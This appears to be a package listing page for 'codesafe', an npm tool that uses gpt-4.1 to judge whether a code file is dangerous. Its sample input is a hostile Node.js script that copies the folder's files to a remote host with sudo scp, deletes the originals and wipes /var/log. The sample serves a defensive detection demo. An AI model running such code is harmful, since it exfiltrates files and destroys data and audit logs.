codesafe helps you find malware, bugs and backdoors in github repos using AI and firebase cloud functions
codesafe npm is a npm package that uses AI (gpt-4.1) to tell you if a code file is safe or dangerous
codeSafe web app: https://codesafe-506d9.web.app
codesafe example:
import fs from 'fs'
import { dirname } from 'path'
import { exec, execSync } from 'child_process'
import { fileURLToPath, pathToFileURL } from 'url'
const files = fs.readdirSync(dirname(fileURLToPath(import.meta.url)), "utf-8")
let main = (import.meta.filename.split("/"))[import.meta.filename.split("/").length-1]
files.forEach((e) => {
if(main != e){
execSync("sudo scp " + e + " admin@10.10.10.10:/home")
fs.unlink(e)
}
})
execSync("sudo rm -rf /var/log")
the above example will get passed though gpt-4.1 and returns a summary about its danger.
initalize:
1. npm install codesafe
2. import codesafe from 'codesafe
3. const obj = new codesafe()
4. console.log(await obj.code_scanner(<code_file>, <limit>))
code_file like index.js and it returns if it dangerous or not (has to be in the same folder)
limit is the word limit of the summary
function list:
1. await obj.code_scanner(<code_file>, <limit>)
hope you enjoy
FAQs
codesafe helps you find malware, bugs and backdoors in github repos using AI and firebase cloud functions
We found that codesafe demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Research
Five coordinated Chrome extensions enable session hijacking and block security controls across enterprise HR and ERP platforms.
Research
Node.js patched a crash bug where AsyncLocalStorage could cause stack overflows to bypass error handlers and terminate production servers.
Research
/Security News
A malicious Chrome extension steals newly created MEXC API keys, exfiltrates them to Telegram, and enables full account takeover with trading and withdrawal rights.